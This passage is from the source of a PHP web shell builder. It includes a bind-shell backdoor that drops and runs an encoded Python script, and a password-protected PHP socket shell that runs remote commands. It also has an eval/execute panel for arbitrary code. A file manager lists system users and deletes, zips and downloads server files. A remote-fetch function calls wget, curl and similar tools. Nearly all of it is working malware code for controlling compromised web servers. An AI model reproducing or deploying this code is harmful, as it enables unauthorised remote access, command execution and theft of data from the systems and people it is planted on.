OiBsaW9uYW5lZXNoQGdtYWlsLmNvbSIpOyAgDQogICAgIHByaW50KCI9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0iKTsNCg=="; 32 | $bindname = 'bind.py'; 33 | $fd = fopen($bindname, 'w'); 34 | if ($fd){ 35 | fwrite($fd, base64_decode($Python_CODE)); 36 | if ($isWIN){ 37 | $sBuff .= '[+] OS Detected = Windows'; 38 | execute('start bind.py'); 39 | $pattern = 'python.exe'; 40 | $list = execute('TASKLIST'); 41 | } else { 42 | $sBuff .= '[+] OS Detected = Linux'; 43 | execute('chmod +x bind.py ; ./bind.py'); 44 | $pattern = $bindname; 45 | $list = execute('ps -aux'); 46 | } 47 | 48 | if (preg_match("/$pattern/", $list)) 49 | $sBuff .= '

Process Found Running! Backdoor Setuped Successfully

'; 50 | else 51 | $sBuff .= '

Process Not Found Running! Backdoor Setup FAILED

'; 52 | 53 | $sBuff .= "

\nTask List :- 
\n$list
"; 54 | } 55 | } 56 | } else if (@$p['mode'] === 'PHP'){ 57 | if (function_exists("socket_create")){ 58 | $sockfd = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);// Create a TCP Stream socket 59 | if (socket_bind($sockfd, $address, $port) == false) 60 | $sBuff .= "Cant Bind to the specified port and address!"; 61 | socket_listen($sockfd, 17);// Start listening for connections 62 | $client = socket_accept($sockfd);//Accept incoming requests and handle them as child processes 63 | socket_write($client, 'Password: '); 64 | $input = socket_read($client, strlen($pass) + 2); // +2 for \r\n // Read the pass from the client 65 | if (trim($input) == $pass){ 66 | socket_write($client, "\n\n"); 67 | socket_write($client, ($isWIN) ? execute("date /t & time /t") . "\n" . execute("ver") : execute("date") . "\n" . execute("uname -a")); 68 | socket_write($client, "\n\n"); 69 | 70 | while (1){// Print command prompt 71 | $maxCmdLen = 31337; 72 | socket_write($client, '(Shell)[$]> '); 73 | $cmd = socket_read($client, $maxCmdLen); 74 | if ($cmd == false){ 75 | $sBuff .= 'The client Closed the conection!'; 76 | break; 77 | } 78 | socket_write($client, execute($cmd)); 79 | } 80 | } else { 81 | $sBuff .= tText('Wrong Password'); 82 | socket_write($client, "Wrong Password!\n\n"); 83 | } 84 | socket_shutdown($client, 2); 85 | socket_close($socket); 86 | //socket_close($client);// Close the client (child) socket 87 | //socket_close($sock);// Close the master sockets 88 | } else 89 | $sBuff .= tText('Socket Conections not Allowed/Supported by the server!'); 90 | } else { 91 | $sBuff .= ' 92 |
93 |
94 |
' . tText('Back Connect') . '
95 |
' . tText('Bind Shell') . '
96 |
97 |
98 |
99 | ' . mInput('ip', $_SERVER['REMOTE_ADDR'], tText('IP'), 1) . ' 100 | ' . mInput('port', '31337', tText('Port'), 1) . ' 101 | ' . mSelect('mode', array('PHP'), 1, 0, 0, tText('Mode')) . ' 102 | ' . mSubmit(tText('Listen'), 'uiupdate(0)', 1) . ' 103 |
104 |
105 | ' . mInput('port', '31337', tText('Port'), 1) . ' 106 | ' . mInput('passwd', 'indetectables', tText('Password'), 1) . ' 107 | ' . mSelect('mode', array('PHP', 'Python'), 1, 0, 0, tText('Mode')) . ' 108 | ' . mSubmit(tText('Bind'), 'uiupdate(1)', 1) . ' 109 |
110 |
'; 111 | } -------------------------------------------------------------------------------- /builder/sections/execute.php: -------------------------------------------------------------------------------- 1 | ' . tText('Eval/Execute') . ''; 7 | $code = @trim($p['c']); 8 | if ($code){ 9 | if (isset($p['e'])){ 10 | $buf = execute($code, true); 11 | $sBuff .= "
" . tText('Response') . ": "; 12 | if (isset($p['dta'])) 13 | $sBuff .= "

"; 14 | else 15 | $sBuff .= "
{$buf}

"; 16 | } else { 17 | if (!preg_match('#<\?#si', $code)) 18 | $code = ""; 19 | 20 | //hago esta chapuzada para que no se muestre el resultado arriba 21 | echo tText('Result of the executed code:'); 22 | $buf = ob_get_contents(); 23 | 24 | if ($buf){ 25 | ob_clean(); 26 | eval("?" . ">{$code}"); 27 | $ret = ob_get_contents(); 28 | $ret = convert_cyr_string($ret, 'd', 'w'); 29 | ob_clean(); 30 | $sBuff .= $buf; 31 | 32 | if (isset($p['dta'])) 33 | $sBuff .= '
'; 34 | else 35 | $sBuff .= "
{$ret}
"; 36 | } else 37 | eval("?" . ">{$code}"); 38 | } 39 | } 40 | 41 | $sBuff .= '
42 |

43 |

' . tText('Display in text-area') . ': ' . mCheck('dta', '1', '', isset($p['dta'])) . '   44 | ' . tText('Execute') . ': ' . mCheck('e', '1', '', isset($p['e'])) . '   45 | [ ' . tText('Get examples') . ' ] 46 |

' . mSubmit(tText('Go!'), 'ajaxLoad(serialize(d.forms[0]))') . '

47 | ' . mHide('me', 'execute') . ' 48 |
'; -------------------------------------------------------------------------------- /builder/sections/filemanager.css: -------------------------------------------------------------------------------- 1 | .asp{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAOBAMAAADUAYG5AAAAHlBMVEX29/fX09Pk4+PKlJPAODWUBgXftbTAW1iuDw3ReXeTvAtzAAAAV0lEQVR4AWPAA1JcwMCJYUanR6dJp2UbQ4WDxbRiR8dihlLLDLd0p0nODBVqmiVFhSXBDOWpZYXJbqHBDFNDQ0NbQ0PDGISNwcCIQQkKGBQFIYABSosBAKxPGDO5nrSTAAAAAElFTkSuQmCC") no-repeat;} 2 | .avi{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQBAMAAADt3eJSAAAAElBMVEVMaXH////AwMCAgIAAAAD/AACxZc2lAAAAAXRSTlMAQObYZgAAAFRJREFUeF5FzMERwCAIRNFtgRICFGAiuUfd/msKyej4T++wAKBmBdkpIrZwlAlyQhxloVoeSXVE124jHA+p1tyBS9UYiVv7aEwEySa+/2zkOvvAvxdlbRDkNPgrwgAAAABJRU5ErkJggg==") no-repeat;} 3 | .cgi{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQBAMAAADt3eJSAAAAGFBMVEVMaXH/2zL06Jebagh4d3WxiDBNS0rcsBxqIGFJAAAAAXRSTlMAQObYZgAAAGtJREFUeAFjAAJmBigwNoAyDKEM5sBgFAazsXFhsbExA4ORkpKgkJKSCYO5kKCgkGCpCQNLuKCgkmiaAwODS6GgUlgKUDWLopBimANIm6C4YhmEERYkGgBkGJWmuKqHABmmQB2hIAaLCxgDALfSD/3zyHbnAAAAAElFTkSuQmCC") no-repeat;} 4 | .cmd{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQBAMAAADt3eJSAAAAGFBMVEVMaXH///+AgIAAAADAwMAAAICAgAD//wBP2DYPAAAAAXRSTlMAQObYZgAAAENJREFUeAFjgAMlKGBQcQEDZQaVUDCAMISFhYEMiBIgQxAMwIw0QyjDPBnCECtSToSImBRDpYRBahC6lGDmGEMB3BUAQQYRh0ILDgoAAAAASUVORK5CYII=") no-repeat;} 5 | .copy{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQBAMAAADt3eJSAAAAGFBMVEVMaXHr8ffC4f6v1PF7nrqOwutWbYw/SVvnK+2gAAAAAXRSTlMAQObYZgAAAFtJREFUeAFjgANm4xAXBzBDUFAwDMwQUgaJgRjGEDFWoWAhJcXQBAYWMEMQxAgVUlI2BDFChJSMDQvADGUUBpugiZCxaSBQJC0FwmAAigkKCgMZQLH08vIEuCsAm2MSZ1K+LZgAAAAASUVORK5CYII=") no-repeat;} 6 | .cpp{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQBAMAAADt3eJSAAAAElBMVEVMaXH///8AAIDAwMCAgIAAAACRQaxqAAAAAXRSTlMAQObYZgAAAEVJREFUeAFjYHEBAgcGBgYWQSAwgTEMHKCM0FAoQ9AUxFBSFFQEMYQUlYSUoAyYCFANXAShBqELYQ6CYQwCQAZrKBgwAACCmg2Bo41i4wAAAABJRU5ErkJggg==") no-repeat;} 7 | .del{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQBAMAAADt3eJSAAAAGFBMVEWeAgKfHx7NlZXCf36mSUm3YGDQAADTnp94I1VJAAAABnRSTlP+8AJGi/pSC0zeAAAAcUlEQVR4Xi2J0QnCQBBERyJ+qwkW8PYK8A4swANiAXLk10DYCrz+XYIPGN7MiFTAKuL1hscXpaUXW3rVs7UxtzYpX3YmmXaquCs4IuwcUv9yKIh8cvcB2c2DT1GOjG3Q7L5FWZXca9yjmDfIKyJVsCs/V0YYHsrbmCoAAAAASUVORK5CYII=") no-repeat;} 8 | .dir{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABMAAAAQBAMAAAAG6llRAAAAGFBMVEVMaXH//5zOzmOcnAAAAAD//87/zpz39/cJIMBEAAAAAXRSTlMAQObYZgAAAEtJREFUeAFjIAyYjY0doEzzUEETqKCSkpKysbEBiBkKAoEqIGagIBCIwZmJiXCmGFw0ESEqBhMFCaaBmWFiQABhKoEBiMngAgEMDABNLxCJtl4npgAAAABJRU5ErkJggg==") no-repeat;} 9 | .doc{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQBAMAAADt3eJSAAAAElBMVEVMaXEAAP/////AwMAAAACAgIDs+4PxAAAAAXRSTlMAQObYZgAAAFxJREFUeF4ljcENgDAMA/1hgdIFEjpB2wFI1AEQgv1XwQn3Op1kGdhecoGi5AFqoPcJZxBd6y+jT5ibmFJKqW12ipuZhJQ69zayiIsqC+dZLGDJi4MlhYSMIGQlH9rmFP/olcG8AAAAAElFTkSuQmCC") no-repeat;} 10 | .download{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQBAMAAADt3eJSAAAAGFBMVEVMaXHy+PxRf7vD3Pdyotucv+mOxGHP8pZRJPvxAAAAAXRSTlMAQObYZgAAAGlJREFUeAE1yTESQUEQhOEuxQH68UiZ3T0AQ85WuwAcQCIXub7ZxR991Q1Mb4oAzBgdjsCZrX3DllyMQJp7YNfhPqyBjUumjjSSl4Yy/EGydkiqmJyuP2R9r0yW5fMRy93T6v0KmFmW2Qe9LBLI5TPE4QAAAABJRU5ErkJggg==") no-repeat;} 11 | .edit{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQBAMAAADt3eJSAAAAGFBMVEVMaXHM4vlAesHy9fTu0HO/jEje0bNiuvgtn6IlAAAAAXRSTlMAQObYZgAAAGVJREFUeAElzcENgCAMQNHGDRoTuBI2MBIdQOCsEXQA6wQeWN+2/NNLm7QAXgKAYeasY0yIuJS9g55XYXLuoJB0ZbaYnIBCvAQmxzQKiOKhOGtFwVrS3T4BD1BgGyfgg/yWv3oNfvxKFuu6ZIarAAAAAElFTkSuQmCC") no-repeat;} 12 | .exe{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABMAAAAOBAMAAAA/Njq6AAAAElBMVEVMaXGEhITGxsb///8AAAAAAL3QMzG6AAAAAXRSTlMAQObYZgAAADdJREFUeAFjYBSEAAEGBkYlMFB0ADJVQ0EgEMoMdnZ2BDEVIWpBTGVjEDCkDlMQbi6LCwQ4MAAAGdsU7SMxZ3cAAAAASUVORK5CYII=") no-repeat;} 13 | .htaccess{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQBAMAAADt3eJSAAAAFVBMVEVMaXH/AAD/AP8AAIAAAACAAID//wAh7q3vAAAAAXRSTlMAQObYZgAAAEhJREFUeAFjSAtggIC0QCiDNVQAyhJRhDKEjAQhDEZnRQEIQwUmJGQMFRJUdhKEyCGEVIwUIUJKzkYwIWMGqKoQByhLwIUBBgAzAQdHwl34ZQAAAABJRU5ErkJggg==") no-repeat;} 14 | .html{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABMAAAAQBAMAAAAG6llRAAAAGFBMVEVMaXFIXpDA1vuEuNwumeJzc3P2+/9fl8ofnhI8AAAAAXRSTlMAQObYZgAAAHtJREFUeF41yr0Kg0AQhdGB/FhfY0idTbB3N6xtBgZsbfIEytZBwXn9uLPkqw6XS0Rh70tWTCnpnw9fv4296oxbVrWGYUr3cac+RbbCrYsyGKtJVLjNPL8YgPHQsXets4NI3bDxODfSX8oaGfBGWpfgXSEBVwDG0yc30g+Tqhs347zYeAAAAABJRU5ErkJggg==") no-repeat;} 15 | .info{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQBAMAAADt3eJSAAAAGFBMVEVMaXHW4/Gcuty90upmkL57o87x9fo/cKp6YdxCAAAAAXRSTlMAQObYZgAAAGxJREFUeAFjQAbGxhDaUFBQCEQzCyopCSqABEQVhYJBQoKhaWmhQFVMQqHCZiaKAQxMoiHOaSqBDkCGi5uIi6MDA6uQCxAARRiMQ9xSXIyAuhxNnFSczIEMFuMQV+MCkNFFgoLqEMvKy5GdAAAtjxBWRk6H0AAAAABJRU5ErkJggg==") no-repeat;} 16 | .ini{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQBAMAAADt3eJSAAAAFVBMVEVMaXH////AwMAAAACAgICAgAD//wBJC4D8AAAAAXRSTlMAQObYZgAAAERJREFUeAFjYGAWBgIGIDB0BAIDBgYWYTAAMgRBQBmFYWxojC5iDBMRCoKKqKYaQkTCzALRRISDUbUrgQCQwWAMAgYMAE/+DM0VyVW8AAAAAElFTkSuQmCC") no-repeat;} 17 | .jpg{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQBAMAAADt3eJSAAAAGFBMVEVMaXETCgDAwMCAgID///+AgAD/AAAA/wCvPqjdAAAAAXRSTlMAQObYZgAAAF9JREFUeAE1yMENAiAMRuGOwG+I3Em4G2QBavVenICLK7C+bY3v9OXR3SNriAjf/njQDkxcDc/WlD+JBgP62mSnHLVhp5w3kh/UfomTAY6TRQO81g8TQEAsR6+eAVGiL7noFeTJktBqAAAAAElFTkSuQmCC") no-repeat;} 18 | .js{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQBAMAAADt3eJSAAAAElBMVEX////AwMCAgIAAAAD//wCAgAA6+FsGAAAAWklEQVR4XlWLyw3AIAxDA2oHQFkgfAZAZAGqTsAh+69SYk716Vl+pnJSSWizEG+IczJAbI2+IdLkDLhN1ScocJqt/n+VagFyGP1xkLddmGKq6ciq6vecEPaOfCLwDtcqFA/EAAAAAElFTkSuQmCC") no-repeat;} 19 | .lnk{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQBAMAAADt3eJSAAAAGFBMVEVMaXFmzzYmnRNLuigJZAUAAgCI71YEPgJXrsCKAAAAAXRSTlMAQObYZgAAAGRJREFUeF4lzLEKgDAMRdEMFedQ7W6LOItgZ8HuRQjuKv5B/9+8mulwE0K0YxIReR9mThlYuBMAQbBa2CKQBh4rmPVGMVh2V0Xc3hsI5fgxyekeoEi79oBk4wrQkIl4qDQ1oCF8s2QTzGgZmRgAAAAASUVORK5CYII=") no-repeat;} 20 | .log{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQBAMAAADt3eJSAAAAGFBMVEVMaXHAwMAAAAD///+AgIAAALWAgAD//wD7+LBgAAAAAXRSTlMAQObYZgAAAFxJREFUeF41jMsJgEAMRIcFC/DiOYxsAf5yly1BbECELcD+wWSN7/SYgQeIAyCtxmxSRkc6lMWY5AzJB/beyVssjEuZv6tebIs+tzSpSvg1kAJfaEH8ZUTQJNEBXtl7FF5T+NYtAAAAAElFTkSuQmCC") no-repeat;} 21 | .mp3{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQBAMAAADt3eJSAAAAFVBMVEVMaXH////AwMCAgIAAAACAgAD//wAFULzlAAAAAXRSTlMAQObYZgAAAGdJREFUeAE1ykEKAjEUA9AgzgFC5wKjg2tj1X2hPcAH7Qm8/xlMi2aTR/4HkJ2rGyJ5/mMb0yOTtQJLtCB34J2KkrHEZ5OMuKxuoz/Xoqwdx+bTfL73Ig0c2iuS4amSE+IPt5MzUGe+vOoRl1gyM5QAAAAASUVORK5CYII=") no-repeat;} 22 | .php{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQBAMAAADt3eJSAAAAGFBMVEXt7u20pbN1PXqqna3h3+CiY5iji5/Cn72aaulJAAAAB3RSTlP+C/jy9vd9m8nrNgAAAGNJREFUeF41zMEJwCAMheF36AK5dAChOIDiuZRMIATP0tIBKpL1m4r9L/kg8EAXM1ciEKz0I9SJliYWnoCdVUc3RLpIEUH2sRU9NjivUfVxhhx8d4YZ1jCqIN6/RTKMDGewEr0JfRdojfORagAAAABJRU5ErkJggg==") no-repeat;} 23 | .pl{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQBAMAAADt3eJSAAAAFVBMVEVLS/WWlrdzc7O7u/L39/0vLzB1dXfIyLy8AAAAbUlEQVR4XkXLQQ4CIQyF4RfxAjWVteIFUAxryfQEmrKfCHP/I0jJJP6rL3l5oD2wSH6KFHC694+Bat+qwa+lKtvkt6xNHmDRs7ZSccHsgFuMA24ARwdnWF7JJQMQsWNO/xcvun69vkEUAp3C9QcQsBJpjnPQBwAAAABJRU5ErkJggg==") no-repeat;} 24 | .py{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAASBAMAAACgFUNZAAAAFVBMVEXU1dBJSUmIiIhMaXH39/ZJf6z12mal68qMAAAABHRSTlPwbJkA1LtzKgAAAGFJREFUeF49yrsNhEAMRdGHZBMjoAFowQ04sIg38cYTTf8l8MwIbnT8wXo+HdhFgjl2BwbCM6UgqvkruOaAJtGIZP/+AYW59wJHVs8vnJcGIq7CRDjhGxHOhRXIzbCATWY3y8IfVW0lgwUAAAAASUVORK5CYII=") no-repeat;} 25 | .rename{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQBAMAAADt3eJSAAAAHlBMVEXP2unl6/NogqS8x9Y/R1L5+/2GlKecqLgrMTpabYUCMXjvAAAACXRSTlP99gP+rv7d/ScbTgzOAAAAdElEQVR4AWNQUmY2NmZrUgIyBBgYRDOgDNYQKINBpAnKCAExBIEAxGiHSiUXGwOBeQlDomBooGhoYAhD4vTk9OLUMBGGxInlCQHTw1gYEmeWTisvL2MBShVODE7MZGFImFg8LT1RTASoS1CAEWgiQ4sLBAAAQBEfQdjw2gUAAAAASUVORK5CYII=") no-repeat;} 26 | .swf{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUBAMAAAB/pwA+AAAAGFBMVEVMaXEAAAD/////RBylAAD8z5/njpP/tgDJs8ZAAAAAAXRSTlMAQObYZgAAAGpJREFUeAFjwAEYBcEAzFQCAUUoM1zJSCkAwlQPMgo2ADGBrFJTU4gC1fJ04wCoWrUiVWNjCDPFSdkYIqriFuIC1aYSlJLsZAxV66LmxgxiKgqpuCmZQNQKhiQpqYCZimIgR6A4B+FIHAAAPKISiDRgUyIAAAAASUVORK5CYII=") no-repeat;} 27 | .tar{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQBAMAAADt3eJSAAAAGFBMVEVMaXE7QAUXAAAAUW/l6ey8lKGJBVFVz9lgkT8gAAAAAXRSTlMAQObYZgAAAFJJREFUeAFjEIQAAYbQ0MQ0IEhicHFJcQkNDQ0CMlJhIoJKIMCgBAEKQMXGYACUMnEvLy8vBjJMYSKCYAayYogdQCkRkOJCIEMUpMQQpBgM4IoBaBkbvmcdFLkAAAAASUVORK5CYII=") no-repeat;} 28 | .txt{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABMAAAAQBAMAAAAG6llRAAAAD1BMVEVMaXH///8AAADHx8eFhYXIFtsVAAAAAXRSTlMAQObYZgAAADVJREFUeAFjYGACAwYQUHQEAQUgi0UIAkBMQTAwQmcqKSopYRFVolQUwTQGAxCTQQkMgC4DAOb7DCz7id5MAAAAAElFTkSuQmCC") no-repeat;} 29 | .unk{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQBAMAAADt3eJSAAAAGFBMVEVMaXGFptrR5PxfaHnx9/60zPMlTqR1iLk29K4nAAAAAXRSTlMAQObYZgAAAFtJREFUeAFjYBAEAgEGIBBxcXERNIAxxMEM1yClcAMgwzUtLUkVxHBLD08DM8KSlCAMJyVFMENISaksFcwACgSFAhlFSmqJqhCGqmgoTASVUQiyvhzIYDYGAQMAJZwXv2puTlMAAAAASUVORK5CYII=") no-repeat;} 30 | .xml{background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQBAMAAADt3eJSAAAAGFBMVEVMaXH6+vqGhoYAAAAsap6Kyu8AAJYzmQAtPsCtAAAAAXRSTlMAQObYZgAAAE9JREFUeAFjUAIDBgYGRUEgEFWAMYSgDGFjAwZFUUEXR1FBICNMRDRMLNCAQTVRJLRMMBUsEp4GFAGpSUsEqxEEARBDxAUI8IogGMYQYAAA5l8SSFIGd4wAAAAASUVORK5CYII=") no-repeat;} 31 | -------------------------------------------------------------------------------- /builder/sections/filemanager.php: -------------------------------------------------------------------------------- 1 | $f, 's' => $s); 24 | } 25 | 26 | function getChmod($filepath){ 27 | return substr(base_convert(@fileperms($filepath), 10, 8), -4); 28 | } 29 | 30 | function getPerms($filepath){ 31 | $mode = @fileperms($filepath); 32 | if (!$mode) { 33 | return '???????????'; 34 | } 35 | 36 | if (($mode & 0xC000) === 0xC000) $type = 's'; // Socket 37 | else if (($mode & 0x4000) === 0x4000) $type = 'd'; // Directory 38 | else if (($mode & 0xA000) === 0xA000) $type = 'l'; // Symbolic Link 39 | else if (($mode & 0x8000) === 0x8000) $type = '-'; // Regular 40 | else if (($mode & 0x6000) === 0x6000) $type = 'b'; // Block special 41 | else if (($mode & 0x2000) === 0x2000) $type = 'c'; // Character special 42 | else if (($mode & 0x1000) === 0x1000) $type = 'p';// FIFO pipe 43 | else $type = 'u'; // Unknown 44 | 45 | $o['r'] = ($mode & 00400) ? 'r' : '-'; 46 | $o['w'] = ($mode & 00200) ? 'w' : '-'; 47 | $o['e'] = ($mode & 00100) ? 'x' : '-'; 48 | $g['r'] = ($mode & 00040) ? 'r' : '-'; 49 | $g['w'] = ($mode & 00020) ? 'w' : '-'; 50 | $g['e'] = ($mode & 00010) ? 'x' : '-'; 51 | $w['r'] = ($mode & 00004) ? 'r' : '-'; 52 | $w['w'] = ($mode & 00002) ? 'w' : '-'; 53 | $w['e'] = ($mode & 00001) ? 'x' : '-'; 54 | 55 | if ($mode & 0x800) $o['e'] = ($o['e']==='x') ? 's' : 'S'; 56 | if ($mode & 0x400) $g['e'] = ($g['e']==='x') ? 's' : 'S'; 57 | if ($mode & 0x200) $w['e'] = ($w['e']==='x') ? 't' : 'T'; 58 | 59 | return $type.$o['r'].$o['w'].$o['e'].$g['r'].$g['w'].$g['e'].$w['r'].$w['w'].$w['e']; 60 | } 61 | 62 | function getUser($filepath){ 63 | if (function_exists('posix_getpwuid')){ 64 | $array = @posix_getpwuid(@fileowner($filepath)); 65 | if ($array && is_array($array)) 66 | return mLink($array['name'], 'return false;', "title='User: {$array['name']} Passwd: {$array['passwd']} " . 67 | "UID: {$array['uid']} GID: {$array['gid']} Gecos: {$array['gecos']} Dir: {$array['dir']} " . 68 | "Shell: {$array['shell']}'", false); 69 | } 70 | return ''; 71 | } 72 | 73 | function vPermsColor($t){ 74 | $c = 'mg'; 75 | if (!is_readable($t)) 76 | $c = 'mr'; 77 | else if (!is_writable($t)) 78 | $c = 'mw'; 79 | return "" . getChmod($t) . ' ' . getPerms($t) . ""; 80 | } 81 | 82 | function delTree($path){ 83 | $origipath = $path; 84 | $h = opendir($path); 85 | while (true){ 86 | $item = readdir($h); 87 | if ($item === '.' or $item === '..') 88 | continue; 89 | 90 | if (gettype($item) === 'boolean'){ 91 | closedir($h); 92 | if (!@rmdir($path)) 93 | return false; 94 | 95 | if ($path == $origipath) 96 | break; 97 | 98 | $path = substr($path, 0, strrpos($path, DS)); 99 | $h = opendir($path); 100 | } else if (is_dir($path . DS . $item)){ 101 | closedir($h); 102 | $path = $path . DS . $item; 103 | $h = opendir($path); 104 | } else 105 | unlink($path . DS . $item); 106 | } 107 | return true; 108 | } 109 | 110 | function recursiveCopy($path, $dest){ 111 | if (is_dir($path)){ 112 | @mkdir($dest); 113 | $objects = scandir($path); 114 | if (sizeof($objects) > 0){ 115 | foreach($objects as $file){ 116 | if ($file !== '.' && $file !== '..'){ 117 | if (is_dir($path.$file)) 118 | recursiveCopy($path . $file . DS, $dest . DS . $file . DS); 119 | else 120 | copy($path . $file, $dest . $file); 121 | } 122 | } 123 | } 124 | return true; 125 | } else if(is_file($path)){ 126 | return copy($path, $dest); 127 | } else { 128 | return false; 129 | } 130 | } 131 | 132 | function getext($file){ 133 | //$info = pathinfo($file); 134 | return pathinfo($file, PATHINFO_EXTENSION); 135 | } 136 | 137 | function checkFile($t, $w, $f){ 138 | $ret = true; 139 | if ($w) 140 | $ret = $ret && is_writable($t); 141 | 142 | /*if ($f){ 143 | if ($re) 144 | $ret = $ret && (preg_match('@' . $sBuff . '@', $file) || preg_match('@' . $sBuff . '@', @file_get_contents($f))) 145 | else 146 | $ret = $ret && (strstr($file, $sBuff) || strstr(@file_get_contents($f), $sBuff)) 147 | } 148 | 149 | if ($extFilter) 150 | $ret = $ret && (in_array(getext($f), explode(',', $extFilter))); 151 | */ 152 | 153 | return $ret; 154 | } 155 | 156 | function download($url, $save){ 157 | global $isWIN; 158 | 159 | if(!preg_match("/[a-z]+:\/\/.+/",$url)) return false; 160 | if(is_file($save)) unlink($save); 161 | if($sBuff = file_get_contents($url)){ 162 | if(file_put_contents($save, $sBuff)) 163 | return true; 164 | } 165 | 166 | if (!$isWIN){ 167 | $buff = execute('wget '.$url.' -O '.$save); 168 | if(is_file($save)) return true; 169 | $buff = execute('curl '.$url.' -o '.$save); 170 | if(is_file($save)) return true; 171 | $buff = execute('lwp-download '.$url.' '.$save); 172 | if(is_file($save)) return true; 173 | $buff = execute('lynx -source '.$url.' > '.$save); 174 | if(is_file($save)) return true; 175 | } 176 | 177 | return false; 178 | } 179 | 180 | function fileList($typ, $dir, $limit, $page, $onlyW = false, $find = false, $rec = false, $count = 0){ 181 | global $fDataD, $fDataF; 182 | $sFolder = $sFile = $show = true; 183 | if ($limit){ 184 | $show = false; 185 | if (!isset($page)) 186 | $page = 1; 187 | 188 | $start = $limit * ($page - 1); 189 | $limit = $limit * $page; 190 | } 191 | 192 | if ($typ === 'dir') 193 | $sFile = false; 194 | else if ($typ === 'file') 195 | $sFolder = false; 196 | 197 | if ($res = opendir($dir)){ 198 | while ($file = readdir($res)){ 199 | if ($limit) { 200 | if ($count == $start) 201 | $show = true; 202 | 203 | if ($count == $limit) 204 | break; 205 | } 206 | 207 | if ($file !== '.' && $file !== '..' && is_dir($dir . $file)){ 208 | if ($rec) 209 | //yield fileList($typ, $dir . $file, $limit, $page, $find, $rec, $count); 210 | fileList($typ, $dir . $file, $limit, $page, $find, $rec, $count); 211 | else if ($show && $sFolder && checkFile($dir . $file, $onlyW, $find)) 212 | //yield array('t'=>'d', 'n'=>$file); 213 | $fDataD[] = $file; 214 | 215 | $count++; 216 | } else if (is_file($dir . $file) && $sFile){ 217 | if ($show && checkFile($dir . $file, $onlyW, $find)) 218 | //yield array('t'=>'f', 'n'=>$file); 219 | $fDataF[] = $file; 220 | 221 | $count++; 222 | } //TODO syslinks 223 | } 224 | 225 | closedir($res); 226 | @clearstatcache(); 227 | } 228 | } 229 | 230 | 231 | // comienzo 232 | if (@$p['md'] === 'vs'){ 233 | $s = dirsize($p['f']); 234 | sAjax(is_numeric($s['s']) ? sizecount($s['s']) . ' (' . $s['f'] . ')' : 'Error?'); 235 | } else if (@$p['md'] === 'tools'){ 236 | switch ($p['ac']){ 237 | case 'cdir': 238 | if (file_exists($p['a'] . $p['b'])) 239 | sAjax(tText('alredyexists', 'object alredy exists')); 240 | 241 | @mkdir($p['a'] . $p['b'], 0777); 242 | @chmod($p['a'] . $p['b'], 0777); 243 | if (file_exists($p['a'] . $p['b'])) 244 | sAjax('OK'); 245 | 246 | sAjax(tText('fail', 'Fail!')); 247 | break; 248 | case 'cfile': 249 | if (file_exists($p['a'] . $p['b'])) 250 | sAjax(tText('alredyexists', 'object alredy exists')); 251 | 252 | if (false !== file_put_contents($p['a'] . $p['b'], '')) 253 | sAjax('OK'); 254 | 255 | sAjax(tText('accessdenied', 'Access denied')); 256 | break; 257 | case 'comp': 258 | if ($p['dl']){ 259 | $zip = new PHPZip(); 260 | $zip->Zipper($p['fl'], $p['dl']); 261 | header('Content-Type: application/octet-stream'); 262 | header('Accept-Ranges: bytes'); 263 | header('Accept-Length: ' . strlen($compress)); 264 | header('Content-Disposition: attachment;filename=' . $_SERVER['HTTP_HOST'] . '_' . date('Ymd-His') . '.zip'); 265 | echo $zip->file(); 266 | exit; 267 | } 268 | break; 269 | case 'uncomp': 270 | if ($p['dl']){ 271 | $types['zip'] = 'zip'; 272 | $types['tar'] = 'tar'; 273 | $types['tar.gz'] = 'targz'; 274 | $types['tgz'] = 'targz'; 275 | 276 | $fNames = array(); 277 | foreach($p['dl'] as $value){ 278 | $ext = pathinfo($value); 279 | if (isset($types[ $ext['extension'] ])) 280 | if (decompress($types[ $ext['extension'] ], $p['fl'] . $value, $p['fl'])) 281 | $fNames[] = $value; 282 | } 283 | 284 | sAjax(tText('pfm', 'Process files:') . implode(', ', $fNames) . ' (' . count($fNames) . ')'); 285 | } 286 | break; 287 | case 'reup': 288 | if (download($p['b'], $p['a'] . basename($p['b']))) 289 | sAjax('OK'); 290 